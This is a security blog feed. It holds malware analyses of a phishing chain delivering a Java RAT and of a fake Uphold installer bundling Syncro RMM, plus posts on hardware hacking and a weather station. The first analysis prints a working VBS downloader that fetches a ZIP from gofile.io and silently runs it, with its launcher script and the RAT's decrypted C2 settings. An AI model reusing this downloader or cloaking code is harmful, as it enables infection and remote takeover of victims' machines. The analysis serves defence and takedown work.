João Pedro Dias

VoicePress5: Tracing a Phishing-to-Java RAT Infection Chain

Wed, 04 Mar 2026 00:00:00 +0000

Another day, another not so boring phishing attempt. This time let’s dive into the analysis of a phishing attempt against a Portuguese volunteer association with a multi-hop infection chain designed to bypass most email phishing scanners.

Spreading the Bait

The email is being spread using a trusted Spanish email service, serviciodecorreo.es, which is authorized to send emails on behalf of various domains, including, in our case, ourense.es. Because the SPF records for these domains authorize serviciodecorreo.es as a legitimate sender, the malicious emails pass SPF validation and appear trustworthy. You can check this with MXtoolbox - SPF Record Check, which returns v=spf1 include:_spf.serviciodecorreo.es ~all.

Subject: Envio em anexo - 202602213326.
Date:  	 26-02-2026 21:45:33
From: 	 placeholder <placeholder@ourense.es>
To: 	 placeholder@placeholder.pt

Exmos. Srs.

Envio em anexo faturas que se encontram por liquidar, 1 fatura já se encontra com 60 dias.

Atenciosamente

* 1 attachment: Fatura.pdf

The email does not contain any obvious threat. The attached PDF is innocuous by itself, as it only contains a link to a OneDrive (https://onedrive.live.com/view.aspx?resid=...) shared PDF file. This file has the same content and look, except for the link on the Ver fatura button, which now points to a URL shortener: https://t.co/xxxxxxxxxx.

This is a nice trick, as most email clients will trust files with links to legitimate sites such as OneDrive (having the short URL could trigger some more advanced scanners), and having the extra hop in the chain also reduces the probability of the short URL being followed and analyzed by automatic tools.

Getting the Juice

If we click on our t.co URL we get redirected to a random Hostinger-hosted free website (lightsalmon-dragonfly-XXXXXX.hostingersite.com). What happens next depends entirely on your browser’s user agent and on a reCAPTCHA verification. If you try to access the website with a Linux-based user agent you are greeted with a broken page mentioning a random Adobe update. If you try to scan the website using, e.g., URLScan.io, you are greeted with a valid and working CAPTCHA verification.

By doing some cURL magic with the user agent (or using a User Agent switcher in the browser) we can get close to the juice. curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" "https://lightsalmon-dragonfly-XXXXXX.hostingersite.com/?2003085881928339" -L -v

Now we have a webpage that performs some JavaScript magic on window.onload based on the user agent information, again.

// ✅ Windows → mantém igual
if (isWindows && (isChrome || isEdge)) {
    document.body.innerHTML = "";
    window.location.href = "https://t.co/h3SvBFiWgg";
    return;
}

if (isMobile) {
    const key = pickKey(mobileTitle, mobileMsg);

    document.documentElement.setAttribute("lang", key);
    document.getElementById("title").innerText = mobileTitle[key] || mobileTitle["en"];
    document.getElementById("paragraph").innerText = mobileMsg[key] || mobileMsg["en"];
    return;
}

And we get a new short URL. A nice detail is that this campaign does not seem to target mobile devices, as it prompts users to open the website on a desktop when a mobile user agent is detected.

By following the new URL we get to a ngrok-served page, docXXXXXX.ngrok.app, and some new JavaScript magic. The code is almost the same, with the difference that it now redirects to a subpage of the ngrok URL, pdf.php. Feel free to check the code on the URLScan Report.

// ✅ Windows → mantém igual
if (isWindows && (isChrome || isEdge)) {
    document.body.innerHTML = "";
    window.location.href = "pdf.php";
    return;
}

If we follow the new link, docXXXXXX.ngrok.app/pdf.php, we finally get some real juice: a VBS script file, PL10-03-2026L.vbs. This is our malware downloader, extractor, and initialization script:

Option Explicit
Dim zipURL, zipPath, destFolder, scriptToRun
Dim objWinHttp, objADOStream, objFSO, shell, wsh

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("Shell.Application")
Set wsh = CreateObject("WScript.Shell")

' Abre a tela de confirmação
On Error Resume Next
wsh.Run "https://drive.google.com/file/d/", 1, False
On Error GoTo 0

zipURL = "https://store-eu-par-1.gofile.io/download/direct/762b5bcc-XXXX-XXXX-bcea-710b28db8cd6/voicepress5.zip"
zipPath = "C:\Users\Public\voicepress.zip"
destFolder = "C:\Users\Public\voicepress"
scriptToRun = destFolder & "\bin\voicepress.cmd"

' Se ainda não tem o zip, baixa
If Not objFSO.FileExists(zipPath) Then
    Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
    On Error Resume Next
    objWinHttp.Open "GET", zipURL, False
    objWinHttp.Send
    If Err.Number <> 0 Then
        WScript.Quit
    End If
    On Error GoTo 0

    If objWinHttp.Status = 200 Then
        Set objADOStream = CreateObject("ADODB.Stream")
        objADOStream.Type = 1
        objADOStream.Open
        objADOStream.Write objWinHttp.ResponseBody
        objADOStream.SaveToFile zipPath, 2
        objADOStream.Close
        Set objADOStream = Nothing
    Else
        WScript.Quit
    End If
    Set objWinHttp = Nothing
    ' Cria a pasta destino
    If Not objFSO.FolderExists(destFolder) Then
        objFSO.CreateFolder destFolder
    End If
    ' Extrai o zip
    shell.NameSpace(destFolder).CopyHere shell.NameSpace(zipPath).Items, 4
    WScript.Sleep 3000
End If
' Abre o manual
If objFSO.FileExists(scriptToRun) Then
    wsh.Run """" & scriptToRun & """", 0, False
End If

Finally, we get the URL to retrieve the malware payload: a gofile.io-hosted ZIP file, downloaded using the WinHttpRequest method. We also get our execution entry point after extracting the ZIP: \bin\voicepress.cmd. Another detail in the script is that it opens a decoy Google Drive page to distract the victim while the VBS downloads the ZIP in the background. The complete infection chain can be seen in the diagram below.

Analyzing the Package

After following the gofile.io link we get our ZIP, voicepress5.zip. By manually extracting it we can see a somewhat familiar folder structure and files:

├── bin
├── COPYRIGHT
├── legal
├── lib
├── LICENSE
├── README.txt
├── release
├── THIRDPARTYLICENSEREADME-JAVAFX.txt
├── THIRDPARTYLICENSEREADME.txt
└── Welcome.html

This is a complete Java installation, as we can verify by looking at the release file:

JAVA_VERSION="1.8.0_441"
JAVA_RUNTIME_VERSION="1.8.0_441-b07"
OS_NAME="Windows"
OS_VERSION="5.2"
OS_ARCH="amd64"
SOURCE=".:git:fea06d2930f8+"
BUILD_TYPE="commercial"

So, whatever malware we are dealing with, it should be Java-based. Using the aforementioned entry point execution path, we can focus on our malware payload, so let’s check the contents of voicepress.cmd.

@echo off
set "extractPath=%TEMP%\collectionservice"
:: Verifica se a pasta existe antes de executar
if exist "C:\Users\Public\voicepress\bin\java.exe" (
    start /B "" "C:\Users\Public\voicepress\bin\java.exe" -jar -noverify "C:\Users\Public\voicepress\bin\voicepress.png"
) else (
    echo Erro: Pasta extraída não encontrada!
    exit /b
)
exit

The voicepress script checks if the extraction succeeded and java.exe exists. After that, it tries to execute a png file. By examining that png file we can see that it is simply a JAR with the extension changed:

$ file voicepress.png 
voicepress.png: Zip archive data, at least v2.0 to extract, compression method=deflate
$ jar tf voicepress.png
com/sun/jna/platform/mac/CoreFoundation$CFIndex.class
com/sun/jna/Callback$UncaughtExceptionHandler.class
...

Unpacking the Payload

The next step is to analyse our JAR. For that, my usual go-to tool is JD-GUI, a just-works Java decompiler. As expected, we are indeed dealing with a Java application: Main-Class: com.proj.client.Client. By looking at the main class we can observe that the code is highly obfuscated using a combination of techniques commonly associated with commercial Java obfuscator tools such as Zelix KlassMaster:

There are some parts, however, that were not properly obfuscated, including the names of classes, files, and several functions. From these we can glean the capabilities of the malware at our hands.

Persistence via service with compatibility across all OSes: right at the start, the malware calls getService().install(); which invokes the OS-specific service handler, service = (IService)new WindowsService();, service = (IService)new LinuxService(); or service = (IService)new OSXService();
Calls back to a Command-and-Control (C2) server: it opens a socket Socket sc = new Socket(); and connects sc.connect(new InetSocketAddress(CONFIG.getHost(), CONFIG.getPort()), <unknown>);
Attempts to distract the victim during installation: pops up random JOptionPanels with JOptionPane.showMessageDialog(null, CONFIG.getMessageBoxText(), CONFIG.getMessageBoxTitle(), CONFIG.getMessageBoxCategory());
Includes a logger class: which seems a careless oversight by the attackers to ship with the malware. When executing the JAR in a sandbox we can see this logger in action: Server not available, retrying in 20ms.
Packs a wide range of features including camera/microphone remote control, keylogger, browser password stealer, etc.: Examples supporting the existence of these features in the code include decryptChromiumPassword, CameraInfo[] getCameras(), and RobotScreenshot.createScreenshot, amongst others.

By submitting the malware sample to VirusTotal we can see this is a known malware of the type RAT (Remote Access Trojan), with the known threat label trojan.java/ratty, with a fairly low detection rate across antivirus solutions: 23/68 security vendors flagged this file as malicious. A diagram of the inner workings of the RAT can be seen in the figure below.

The AI Tricks

So, we have a highly obfuscated JAR of a known malware strain. However, we have, so far, no insight into the strings in the code, and that is typically where the most important information lies: hostnames, ports, etc. As most of the strings are encrypted with XOR or similar strategies, we should be able to decrypt them, because the JAR is a self-contained piece and must therefore carry all the encryption keys for whatever encryption is in use. By feeding the JAR into Claude (free version) and asking it to decrypt the code, it was able to create a Python script (after some back-and-forth) that takes the JAR as input and applies heuristics to decrypt most of the strings.

You can find the “decoder” code in the following gist: 202028376caa0564a0d5a190ae784299

After examining the decoded strings, a closer look at the Config.class, which is used by the main Client.class to load configurations, reveals some interesting entries:

======================================================================
  com/proj/client/Config
======================================================================
  (xor     ) key='bChDk'   =>  'Hide_Client_File'
  (xor     ) key='wVRAg'   =>  'Show_Message_Box'
  (des     ) key='gUhCV'   =>  'Message_Box_Title'
  (des     ) key='qzLNE'   =>  'Message_Box_Text'
  (blowfish) key='XUaqE'   =>  'checksum'
  (xor     ) key='HbLHt'   =>  'checksum'
  (des     ) key='iDsaf'   =>  'Failed to read config'

Why is a checksum file used in a configuration?…

By examining the checksum file, we can see that it does indeed look a lot like a checksum hash. But now we know this is just smoke and mirrors to make the file appear harmless when, in reality, it is a core part of the malware configuration. Once again, let’s see if Claude is up to the task of figuring out how to decrypt it.

You can find the code at the Gist: 202028376caa0564a0d5a190ae784299

[+] Loaded checksum file: ../voicepress5/bin/voicepress/checksum
[+] Decrypted successfully (256 bytes → 190 chars)

  AES key string : 'checksum'
  AES key (hex)  : a80ed2ef79e22f1d8af817cea1dbbf01

  Host                      = 80.211.137.XX
  Port                      = 7711
  AutoStart                 = true
  Hide_Client_File          = false
  Show_Message_Box          = false
  Message_Box_Title         = 
  Message_Box_Text          = 
  Message_Box_Category      = -1

Claude was able to successfully craft a decryptor for the checksum file and reveal the RAT’s configuration. By storing these configurations in a file, attackers can easily reconfigure their malware without needing to recompile the Java code, enabling attacks at scale. But how exactly did Claude figure it out?

We already know that the loadConfig function references the checksum file (as per the previous step), but this checksum string appears twice, and in the second reference it is used as an argument to the decryptAES static method call as a decryption key (careless or intentional?). This decryptAES function must be defined somewhere. The malware packs a CryptUtil class, and by decoding the strings from that class we see some interesting results:

======================================================================
  com/proj/client/util/security/CryptUtil
======================================================================
  (des     ) key='LRqHH'   =>  'AES/ECB/PKCS5Padding'
  (xor     ) key='EZovn'   =>  'AES/ECB/PKCS5PADDING'
  (xor     ) key='pNJAQ'   =>  '.enc'
  (des     ) key='tyvJd'   =>  'AES'
  (blowfish) key='PbUxI'   =>  '.dec'
  (blowfish) key='rTeNm'   =>  'AES'
  (xor     ) key='LvcgR'   =>  'SHA-1'
  (xor     ) key='UTgUh'   =>  'AES'

The key detail here is the SHA-1 string. AES encryption in Java requires a key of exactly 16, 24, or 32 bytes, but the input decryption key checksum is only 8 bytes, which is not enough for AES to work. However, the malware code hashes the initial key with SHA-1 to extend it:

javaMessageDigest.getInstance("SHA-1").digest(keyString.getBytes("UTF-8")) gives 20 bytes, and then,
Arrays.copyOf(result, 16) truncates the SHA-1 hash to give us the required 16-byte key.

With that, we can use the identified encryption scheme AES/ECB/PKCS5Padding to decrypt the checksum configuration:

key        = derive_aes_key(key_string) #javaMessageDigest.getInstance("SHA-1").digest(keyString.getBytes("UTF-8"))
ciphertext = base64.b64decode(encoded_content.strip()) #checksum file content
cipher     = AES.new(key, AES.MODE_ECB)
padded     = cipher.decrypt(ciphertext)

Looking at the extracted configuration, we can see that the malware attempts to connect to a C2 server at 80.211.137.XX on port 7711. We can also observe configuration options such as auto-start being enabled. By checking the ARIN record for that IP address we can see it belongs to Aruba S.p.A. - Cloud Services Farm2, part of aruba.it, an Italian IT services provider that offers on-demand servers. This can also be verified with Mxtoolbox - ARIN Lookup.

Threat Landscape

This is one of the most sophisticated phishing campaigns I have had the opportunity to analyze. Looking around online, we can find reports of similar campaigns based on the same Ratty malware family:

2024: ESENTIRE - Beware the Bait: Java RATs Lurking in Tax Scam Emails, a phishing campaign leveraging tax themes within the Business Services sector using the same Ratty RAT
2025: Mail campaign delivers Java-based RAT, a malicious email campaign observed targeting organizations in Italy 🇮🇹, Portugal 🇵🇹, and Spain 🇪🇸 using the same Spanish email provider service
2025: Multilayered Email Attack: How a PDF Invoice and Geo-Fencing Led to RAT Malware, another similar report mentioning the same campaign.

From these references we can see that similar strategies are being used (including the same email service), and the target profile is consistent: Portugal, Spain, and Italy. Regarding attribution, most of the code comments are in Portuguese, so it would not be surprising if this malware was adapted with the help of an AI agent, considering that the original Ratty was an open-source project, although the repository no longer exists. Some information about its origins can be found on malpedia - Ratty.

In the VBS script mentioned earlier, there were some seemingly random strings: 'MFGS52or138e 52 peCSDF52aSDASce 138 iFAFGGFn 138 thAFDGGFSDFDe 138 woDSAFDDFD52rld! 52 e 138 DüDADFDFDDn52yada 52 dDSADFDFDFaha 138 fazDSADFDFDla 138 baDASDFDSD138rış!. After stripping the garbage we get the real message:

More peace in the world! Dünya’da daha fazla barış!

The last part is Turkish for “More peace in the world!”, which could point to a Turkish 🇹🇷 origin, but this is pure speculation.

Timeline

[26/02/2026] Phishing email received.
[03/03/2026] IP reported to aruba.it as malicious activity and taken down.
[04/03/2026] OneDrive file reported as malicious activity and taken down.

Plywood Trojan: When Attackers Go Budget

Mon, 17 Nov 2025 00:00:00 +0000

I’m always amused by the smell of a fresh phishing email in the morning. And this time, a closer to home one, as I know the target company since I have a friend working there, namely, Uphold. So let’s dive right in.

Disclaimer: Uphold is not in any way affiliated with this research nor its outcomes.

Target Acquired

As always, the surprise comes in the subject of the email: “Introducing Uphold Desktop Application — Built to Resolve User Issues and Enhance Your Experience” coming from a suspect email address newsletter@uphold25.blog in the name of Uphold. To nobody’s surprise, I don’t have an account on Uphold, so this is not really spear-phishing.

Email contents (click to expand)

Dear Uphold User,

Over the past months, we have listened carefully to your feedback concerning account restrictions, withdrawal delays, verification challenges, customer-support response times, 2FA difficulties, device-compatibility problems, and other unexpected disruptions. We recognize the frustration these issues have caused, and we appreciate your patience as we focused on strengthening the Uphold platform.

We are pleased to introduce the Uphold Desktop Application — a major upgrade designed specifically to fix, correct, and fully rectify the recent challenges many users have experienced.

The latest desktop environment delivers:

Enhanced reliability and stability, reducing account-usage interruptions and verification failures.
Improved transaction handling, ensuring smoother deposits, withdrawals, and transfers.
Strengthened security infrastructure, including upgraded 2FA and safer wallet-linking protocols.
A modern, refined interface that makes navigation faster and more intuitive.
Maximum efficiency, especially for users who faced limitations on older mobile devices.
Priority support integration, allowing improved issue resolution directly within the app.

Uphold services — trading, asset management, transfers, staking, and wallet operations — are more efficient, more secure, and more user-friendly on the desktop platform. The application represents the next stage in our commitment to delivering a seamless, transparent, and dependable experience for every Uphold user.

📥: [https://www.upholddesktop.app/](https://www.upholddesktop.app/) We encourage all users to download and begin using the Uphold Desktop App, where you'll benefit from these enhancements directly and enjoy a more consistent, stable, and streamlined interface.

Thank you for your continued trust. We remain fully committed to building a platform that meets your expectations and supports your prosperity.

Sincerely,

The Uphold Team.

So, we finally get our juicy link https://www.upholddesktop.app/. This is a simple page, but a really well-made one, hosted on Vercel¹ (seems to be a trend now).

Checking the WHOIS data for the domain does not provide any useful data other than the registar NiceNIC.net. NiceNIC website has a partially broken SSL certificate, and seems to sell domains in bulk - offering an API to create them on-demand (Free Reseller API) which seems a nice trick for more automation on the attacker’s side.

The Analysis

The first thing that I like to do is a quick scan using urlscan.io. As expected, the report is matching the expected “Malicious Activity!” (feel free to check the public report here).

So, we have a download button pointing to Gofile (another random file hosting website), https://store-na-phx-3.gofile.io/download/direct/42fc8912-xxxx-xxxx-xxxx-fe121eefd839/Uphold-installer.exe. Let’s download it (be careful if you decide to do similar adventures on your own; it is always recommended to use a sandbox machine or virtual machine).

Let’s upload the bug to VirusTotal. Once again, rightfully detected, but strangely enough just by a handful of antivirus tools, more precisely only 8 out of 72 antivirus programs flag it as malicious (you can find the report here). Most of the ones that detect it identify it as either a trojan or remote tool (should we say same face of the same coin?).

Until so far we depended on automated analysis and reports, but should we take a closer look? Although one can have fun setting up a malware sandbox (e.g., FLARE-VM), nowadays time runs short, so using a free sandbox is more than enough. For me the go-to has always been ANY.RUN as the free usage tier is not bad at all.

The tool allows you to upload your executable and trigger its execution inside a Windows 10 environment. This allows us to see the malware’s movements in a safe, automated, and lazy way. As per the executable behavior, ANY.RUN also flags the executable as malware, and you can find the execution report here.

One of the best views is the execution graph, which gives you an overview of the malware execution path and makes visible some of its inner workings. One of the things that stood out in several aspects was the name of the executable dropped by the main uphold-installer.exe, more concretely syncro.installer.exe.

Syncro is yet another Remote Monitoring and Management (RMM) tool which seems to have changed names at some point from Kabuto (name still used to download the tool from https://production.kabutoservices.com/). And the tool seems to be owned by RepairTech (https://www.repairtechsolutions.com/documentation/kabuto/), which is still in the tool installation path: %ProgramFiles%\repairtech\syncro\install.bat.

Looking at the malware’s execution first command, we can also see that it passes by argument both a JWT token and a configuration file in base64:

"C:\Users\admin\AppData\Local\Temp\Syncro.Installer.exe" --jwt-payload "eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJ2ZXJzaW9uIjoxLCJpbnN0YWxsIjp7InNob3AiOiJ1Q2xLcVpHU2dkcVR6aldXWHREWHZRIiwiY3VzdG9tZXJfaWQiOjE3NjAzMDEsImZvbGRlcl9pZCI6NDczMDUzNn0sInNlcnZpY2luZyI6eyJjaGFubmVsIjoic3luY3JvLXJ0bSIsInRhcmdldCI6InN5bmNybyJ9fQ.L7Ch7BjgPHpGqlOAnXdQLncIdXzq8xjjb7GDpDdPMypo3_qX6VV_c9sbmxvCkelI0tkyLcSHyEWEYLQ4QijxAw" --config-json "ewogICJBdXRoVXJsIjogImh0dHBzOi8vYWRtaW4uc3luY3JvYXBpLmNvbSIsCiAgIkthYnV0b1VybCI6ICJodHRwczovL3JtbS5zeW5jcm9tc3AuY29tIiwKICAiU3luY3JvVXJscyI6IFsKICAgICJodHRwczovL3tzdWJkb21haW59LnN5bmNyb2FwaS5jb20iLAogICAgImh0dHBzOi8ve3N1YmRvbWFpbn0uc3luY3JvbXNwLmNvbSJdLAogICJMb2dEdW1wZXJVcmwiOiAiaHR0cHM6Ly9sZC5hdXJlbGl1cy5ob3N0IiwKICAiVXBkYXRlVXJsIjogImh0dHBzOi8vcHJvZHVjdGlvbi5rYWJ1dG9zZXJ2aWNlcy5jb20vc3luY3JvL21haW4vdXBkYXRlcy8iLAogICJPdmVybWluZFVwZGF0ZVVybCI6ICJodHRwczovL3Byb2R1Y3Rpb24ua2FidXRvc2VydmljZXMuY29tL3N5bmNyby9vdmVybWluZC91cGRhdGVzLyIsCiAgIkNob2NvbGF0ZXlJbnN0YWxsZXJVcmwiOiAiaHR0cHM6Ly9wcm9kdWN0aW9uLmthYnV0b3NlcnZpY2VzLmNvbS9jaG9jby9rYWJ1dG9fcGF0Y2hfbWFuYWdlciIsCiAgIldlYlNvY2tldFVybCI6ICJ3c3M6Ly9yZWFsdGltZS5rYWJ1dG9zZXJ2aWNlcy5jb20vc29ja2V0IiwKICAiQ2hhdFVybCI6ICJ3c3M6Ly9jaGF0LWNoYXQuc3luY3JvbXNwLmNvbS9zb2NrZXQiLAogICJfIjogIiIKfQo="

By decoding the JWT token we can see the authentication payload passed to Syncro:

{
  "version": 1,
  "install": {
    "shop": "uClKqZGSgdqTzjWWXtDXvQ",
    "customer_id": 1760301,
    "folder_id": 4730536
  },
  "servicing": {
    "channel": "syncro-rtm",
    "target": "syncro"
  }
}

And by looking at the configuration, we can also find more details about the installation configuration:

{
  "AuthUrl": "https://admin.syncroapi.com",
  "KabutoUrl": "https://rmm.syncromsp.com",
  "SyncroUrls": [
    "https://{subdomain}.syncroapi.com",
    "https://{subdomain}.syncromsp.com"],
  "LogDumperUrl": "https://ld.aurelius.host",
  "UpdateUrl": "https://production.kabutoservices.com/syncro/main/updates/",
  "OvermindUpdateUrl": "https://production.kabutoservices.com/syncro/overmind/updates/",
  "ChocolateyInstallerUrl": "https://production.kabutoservices.com/choco/kabuto_patch_manager",
  "WebSocketUrl": "wss://realtime.kabutoservices.com/socket",
  "ChatUrl": "wss://chat-chat.syncromsp.com/socket",
  "_": ""
}

So, at the end of the day, we can find that the trojan, if we can call it such, was nothing more than a bundled version of a, let’s say, shady RMM tool, which, if installed, would provide the attacker full access to the victim’s computer. And I can almost bet that the attacker’s are leveraging the Free trial provided by Syncro.

The last piece of the puzzle was to understand how it bypassed so many antivirus programs, but this is easily explained by the verified signature of the RMM software by Servably Inc., yet another name for the same company. The certificate details can be found in abuse.ch where we can see that the same signature was used in at least another 15 samples.

Timeline

[15/11/2025] Phishing email received
[16/11/2025] Domain reported to Google. File reported as abuse to Gofile. Syncro abuse also reported to the company without any reply.
[17/11/2025] Domain takedown.

Footnotes

Threat Insight: Cybercriminals Abusing Vercel to Deliver Remote Access Malware. ↩

Hardware Hacking 101 Village - Post-Mortem

Fri, 25 Jul 2025 00:00:00 +0000

On June 14, 2025, I organized a hardware hacking focused village as part of the ØxＯＰＯＳɆＣ Hack Day, and this is a post-mortem analysis of the village, focusing on some of the observations and common mishaps, and how to improve your journey in the hardware hacking world, especially from a beginner’s standpoint.

Get the Basics Right: Learn Electronics and Hardware Programming

Before diving into the world of hardware hacking, learn the basics of hardware programming and electronics. Using the craziest fault injection technique will seem like magic if you don’t understand why bit flips happen and what that implies, e.g., in jumping instructions. So get your hands on a cheap Arduino Nano, or ESP32, some protoboard and some sensors, and get your hands dirty building something. You have plenty of places to find beginner projects, e.g., Arduino ProjectHub and Hackaday.io.

Collect Target Devices

You know that old router you’re going to throw away? Keep it! Ask your friends if they have old IoT devices that they no longer use. Buy cheap IP cameras from AliExpress. The goal is variety, not quality. Different manufacturers create things differently, so there are more tricks and quirks to learn and experiment with. Just collect hardware. They are fun to play with – and also easy to ruin – and once you free the magic smoke, there is no going back.

Don’t Be Afraid of Soldering

If you are playing in the world of hardware, you will unavoidably need to solder at some point. Get a regulatable temperature soldering iron (like these fancy Pinecil $30 USB-C powered ones) and you are good to go. But only solder when you need to – most of the time you can get away with pogo pins, Micro IC Hook Clips or fancy needle-probes.

If you want to build a fancy version, I recommend this 3D-printed PCB probing jig.

Serial Interfaces Everywhere

FT232RL USB-to-serial converters are essential. Get USB-C versions if possible. UART interfaces are your gateway to most devices.

Logic Analyzers: Cheap Works

Get a cheap 8-channel logic analyzer. €20 gets you something that is fiddly to work with, but it should work for most scenarios, even if it needs some trial and error. Don’t expect high accuracy or the ability to record high baudrate signals, but those are not that common on consumer-level devices.

Also, use simple UI software. Saleae Logic software and sigrok/PulseView are both free and work with these cheap analyzers. You get professional-grade protocol decoding without the professional price tag.

Multimeters: Get One, and Then Another One

Start cheap; anything will mostly work. But a proper UNI-T or equivalent brand multimeter around €80 is worth it. You get accurate readings and something you can trust for both electronics and home repairs involving high voltage (be careful anyway).

Most Things Are Obvious

Debug pins are labeled on PCBs. Test points have silk screen text. UART interfaces sit there waiting. Manufacturers assume no one will look (or they don’t care enough).

Fault Injection on a Budget

Need fault injection? A mosquito net works. David Buchanan’s DRAM EMFI technique shows how simple solutions are sometimes all you need. Before trying fault injection on real-world devices, start with things you have programmed yourself – that way you can easily understand what is going on.

Software That Works

Don’t be hard on yourself by forcing yourself to learn crazy terminal interfaces with too many flags for any human being to know by heart unless you work with them constantly. UIs were created for a reason – use them!

CuteCom for serial communications.
IMSProg for EEPROM work.
Ghidra for reverse engineering.

UIs save time. Your brain should focus on the problem, not command flags and syntax.

Firmware Is Right There

Most firmware is accessible through the bootloader. Connect to UART, interrupt the boot process, dump flash contents. No need for complex extraction.

Once you have firmware, binwalk does the heavy lifting. Extract filesystems, find interesting files, analyze without reverse engineering. Sometimes you don’t even need Ghidra – grep will take you a long way. Search for certificates, endpoints, passwords… they will be there.

Check out my previous adventure with a D-Link router for a practical example of this workflow - bootloader access, firmware extraction, and finding vulnerabilities in plain text configuration files.

Radio Waves: The Invisible Attack Surface

IoT devices love wireless communication, and most of it happens on unlicensed bands that you can legally intercept. For the other bands, you can at least hear them. Get a NooElec RTL-SDR dongle for around $30 and suddenly you can see the radio spectrum. 433MHz, 868MHz, 915MHz – these frequencies are where garage doors, weather stations, car key fobs, and cheap IoT sensors live.

Start with SDR# or GQRX to visualize signals. Most protocols are simple – no encryption, predictable patterns, and easily susceptible to replay attacks. That smart doorbell? Probably sending data in plain text – and a good prank to make your neighbor’s bell ring. Your car’s tire pressure sensors? Definitely no authentication.

Don’t forget about 2.4GHz either. WiFi and Bluetooth are everywhere, with a lot of WEP access points still in the wild, as well as hardcoded authentication on Bluetooth low energy – that you can play with using some cheap micro:bits and btlejack.

3, 2, 1, GO!

Hardware hacking isn’t about expensive gear or obscure exploits. It’s about learning the concepts, trying things out, letting some magic smoke escape, and finding that juicy UART port that already has the debug pins soldered from the factory. Start with simple tools, find targets, and explore. The hardware world is full of secrets hiding in plain sight, sometimes even labeled.

If you participated in the village, thank you for attending. And, as always, kudos to ØxＯＰＯＳɆＣ, to the event organizers and to the community that keeps these events alive.

P.S. If you want to get some inspiration on what hardware to buy, check my previous post about my go-to toolkit.

How to Run Your Own Weather Station

Fri, 02 May 2025 00:00:00 +0000

Some months ago I decided to finally acquire a weather station. Nothing fancy, just a cheap enough, no frills, weather station. As I wanted to have the least amount of trouble setting it up, I bought a WiFi-enabled unit, in a way I could stream the data, somehow, via Internet. However, things going smoothly is a rare sight, and there is always more to it. So let’s dive into how to stream data to the Internet with a not-so-WiFi-enabled station.

The Acquisition

After looking at some deals here and there, I finally found a station with a price tag of ~100€, which seemed like a good deal, the Bresser WIFI ClearView 7-in-1 (ref. 7002586). The description stated that it came with sensors for measuring wind, humidity, temperature, rainfall, UV level, and light intensity, which would be more than enough for my purpose.

It took only a few days and the package arrived. However, the package stated 8 in 1 — a fact that I simply ignored. So I proceeded to just install and configure the station. Which boils down to connecting the base station to a power source, adding 4 AA batteries to the sensor station, and installing it on the balcony.

Later that day, I decided to configure the WiFi settings — and that’s when the problems began. The station is supposed to create an access point that can be used to do the first configuration, but no access point was found.After fiddling with it for a while, I decided to give the manual a shot ~~RTFM~~, just to find out that there was nothing about WiFi in there. So, after all, it hit me: I had been shipped the wrong model, the Bresser 8-in-1 ClearViewTB Weather Station (ref. 7003150).

Of course I didn’t want all the trouble of shipping it back (especially because it was already mounted), so I went the hard way. After just confirming that the transmission protocol of the weather sensor station back to the main station was non-encrypted at 868Mhz, it seemed the perfect project to give some use to some of the hardware that I have laying around.

The BresserWeatherSensorReceive Project

Of course, I’m not the first one to want to decode the data from the Bresser weather stations. And the work done by mathias-bs on the project BresserWeatherSensorReceiver is the keystone here. Capable of decoding data from most Bresser station models, this piece of magic code can be deployed on any Arduino-compatible platform and just read the data, if you have a compatible radio, namely the CC1101, SX1276/RFM95W, SX1262 or LR1121. If you look carefully to this radio chip list, the SX1276 is a known chip used for LoRa protocol, that also uses 868Mhz in Europe, which is bundle together in a nice packaging in the TTGO LoRa32 V2.1 (1.6.1).

So, having one of those lying around I just created a new PlatformIO project with the example from mathias-bs hoping that everything worked out of the box ~~(famous last words)~~. Of course, nothing is ever so easy, and the library didn’t support decoding of the specific model that I got, and the data was empty, so the decoding was failing completely.

Id: [    6241] Typ: [D] Ch: [0] St: [0] Bat: [Low] RSSI: [-107.5dBm] 
Temp: [---.-C] Hum: [---%] Wmax: [--.-m/s] Wavg: [--.-m/s] Wdir: [---.-deg] Rain: [-----.-mm] UVidx: [--.-] Light: [--.-klx] 
[334842][V][WeatherSensor.cpp:392] getMessage(): [SX1276] Data: D4 6E A7 C8 EB 88 2A D8 AD AA FD AA A8 98 AA BF FC 3E AA 82 22 AA AA BE 3A AA 00 
[334854][D][WeatherSensor.cpp:394] getMessage(): [SX1276] R [D4] RSSI: -70.5
[334861][D][WeatherSensor.h:647] log_message():           Byte #: 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 
[334874][D][WeatherSensor.h:657] log_message(): De-whitened Data: C4 0D 62 41 22 80 72 07 00 57 00 02 32 00 15 56 94 00 28 88 00 00 14 90 00 AA 
[334887][V][WeatherSensorDecoders.cpp:67] findSlot(): find_slot(): ID=00006241
[334894][D][WeatherSensorDecoders.cpp:105] findSlot(): sensor[0]: v=0 id=0x00006241 t=13 c=0
[334902][V][WeatherSensorDecoders.cpp:130] findSlot(): find_slot(): Storing into slot #0

As, unfortunately, time does not grow on trees, I didn’t have the time to dedicate myself to understand the protocol and decode the station data as needed. Thus I went the lazy way and opened an issue on the mathias-bs repository Request for support for 7003150 8 in 1 station #220. The answer to the request was swift and in the space of a day I had a working solution. The station features a not-so-common sensor known as a “globe thermometer”, which is used to calculate the Wet Bulb Globe Temperature (WBGT)¹.

At last, we had correct data for the weather station being streamed and matching the values displayed on the display unit.

Id: [    6241] Typ: [D] Ch: [0] St: [0] Bat: [Low] RSSI: [-104.5dBm]
Temp: [  9.6C] Hum: [ 83%] Wmax: [ 3.9m/s] Wavg: [ 3.8m/s] Wdir: [287.0deg] Rain: [   67.6mm] UVidx: [0.0] Light: [0.5klx] 
[332685][V][WeatherSensor.cpp:392] getMessage(): [SX1276] Data: D4 C3 49 C8 EB 8D CA D8 AF BA E2 AA AC DC AA A3 CC 28 AA AF 9D AA AA AA 4A AA 00 
[332697][D][WeatherSensor.cpp:394] getMessage(): [SX1276] R [D4] RSSI: -106.0
[332705][D][WeatherSensor.h:648] log_message():           Byte #: 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 
[332717][D][WeatherSensor.h:658] log_message(): De-whitened Data: 69 E3 62 41 27 60 72 05 10 48 00 06 76 00 09 66 82 00 05 37 00 00 00 E0 00 AA 
